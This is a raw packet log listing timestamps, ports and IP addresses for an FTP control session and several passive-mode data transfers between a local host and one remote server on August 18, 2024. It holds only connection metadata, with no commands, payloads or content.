Aug 18, 2024 18:29:33.553955078 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.556679964 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.584593058 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:34.031513929 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:34.082401037 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:43.758579969 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:43.764187098 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:43.978152990 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:43.979747057 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:43.984796047 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:43.986882925 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:43.986974955 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:43.992070913 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.610410929 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.610656023 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.616792917 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.616825104 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.616858006 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.616873980 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.616894960 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.616902113 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.616926908 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.616929054 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.616952896 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.616977930 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.617058039 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.617084980 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.617110968 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.617119074 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.617136002 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.617146015 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.617167950 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.617201090 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.617305994 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.617377996 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.621893883 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.621922016 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.621962070 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.621984959 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.622044086 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.622091055 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.622117996 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.622145891 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.622174025 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.622205019 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.622231007 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.622256041 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.622257948 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.622291088 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.622334957 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.622417927 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.622478962 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.622543097 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.622571945 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.622601986 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.622602940 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.623075962 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.627037048 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.627679110 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.627888918 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.627916098 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.628001928 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.628124952 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.628186941 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.628213882 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.628240108 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.628509998 CEST	53290	54703	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:44.628559113 CEST	54703	53290	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:44.660533905 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:45.097763062 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:45.205127001 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:48.525130033 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:48.530162096 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:48.747360945 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:48.747886896 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:48.753541946 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:48.753612995 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:48.753701925 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:48.758632898 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.378923893 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.379189968 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.384193897 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.384222031 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.384246111 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.384269953 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.384340048 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.384355068 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.384370089 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.384386063 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.384403944 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.384406090 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.384418011 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.384422064 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.384443998 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.384459972 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.384495020 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.384507895 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.384533882 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.384555101 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.386502981 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.386544943 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.389120102 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.389161110 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.389209032 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.389244080 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.389250994 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.389257908 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.389271021 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.389285088 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.389285088 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.389297962 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.389317989 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.389336109 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.389380932 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.389429092 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.389518023 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.389584064 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.390027046 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.390083075 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.391360044 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.391397953 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.394102097 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.394145012 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.394294024 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.394407988 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.394447088 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.394520998 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.394534111 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.395020962 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.395103931 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.395140886 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.395155907 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.396234989 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.399008036 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.399208069 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.399761915 CEST	54777	54704	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:49.399804115 CEST	54704	54777	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.535526037 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:49.875055075 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:50.035518885 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:02.483196020 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:02.488164902 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:02.711546898 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:02.718628883 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:02.723500013 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:02.727750063 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:02.727756023 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:02.732573032 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.356327057 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.399390936 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.404462099 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.404541016 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.404556036 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.404571056 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.404597044 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.404612064 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.404644966 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.404659986 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.404675007 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.404678106 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.404680967 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.404742956 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.404787064 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.405116081 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.409568071 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.409584045 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.409600019 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.409612894 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.409673929 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.409673929 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.409679890 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.409712076 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.409724951 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.409740925 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.409746885 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.409768105 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.409780979 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.409802914 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.409816980 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.409821033 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.409847975 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.409869909 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.410583019 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.411786079 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.414629936 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.414742947 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.415102959 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.415117025 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.415131092 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.415143967 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.415157080 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.416821003 CEST	52836	54705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:03.419776917 CEST	54705	52836	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:03.938325882 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:04.035517931 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.046627998 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.051559925 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.265959978 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.266520023 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.271460056 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.271564007 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.271620989 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.276393890 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.908037901 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.908291101 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.913343906 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.913373947 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.913420916 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.913435936 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.913460016 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.913477898 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.913491011 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.913609028 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.913616896 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.913634062 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.913662910 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.913728952 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.913777113 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.913791895 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.913805962 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.913877010 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.918713093 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.918735981 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.918747902 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.918764114 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.918776989 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.918788910 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.918792963 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.918831110 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.918915987 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.918922901 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.918930054 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.918942928 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.918977022 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.919080019 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.919085026 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.919219017 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.919224977 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.919291019 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.929465055 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.929588079 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.932199955 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.934998989 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.935271978 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.945477009 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.947756052 CEST	53479	54706	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:10.950741053 CEST	54706	53479	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:10.958657026 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:11.406085968 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:11.457422972 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:16.794215918 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:16.799252987 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.014482021 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.016020060 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.023386002 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.024739981 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.024995089 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.030097008 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.662544966 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.662847042 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.667896032 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.667907953 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.667917013 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.667927027 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.667963982 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.667994976 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.668050051 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.668107033 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.668150902 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.668160915 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.668169975 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.668179035 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.668193102 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.668222904 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.668234110 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.668272972 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.673002958 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.673070908 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.673108101 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.673139095 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.673156977 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.673166990 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.673182964 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.673187971 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.673202038 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.673214912 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.673216105 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.673228025 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.673240900 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.673253059 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.673265934 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.673269987 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.673326015 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.673338890 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678143024 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678210974 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678467035 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678492069 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678554058 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678625107 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678637981 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678649902 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678697109 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678970098 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.678982973 CEST	63442	54707	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:17.679023027 CEST	54707	63442	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:17.707370043 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:18.161355019 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:18.207403898 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:27.814548969 CEST	54708	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:27.819644928 CEST	21	54708	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:27.819720030 CEST	54708	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:27.832304001 CEST	54708	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:27.837656021 CEST	21	54708	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:27.837709904 CEST	54708	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:28.350639105 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:28.355685949 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:28.355752945 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:28.997075081 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:28.997710943 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:29.003314018 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:29.228157043 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:29.228765965 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:29.233795881 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:29.494338036 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:29.495095015 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:29.499986887 CEST	21	54709	104.247.165.99	192.168.2.5
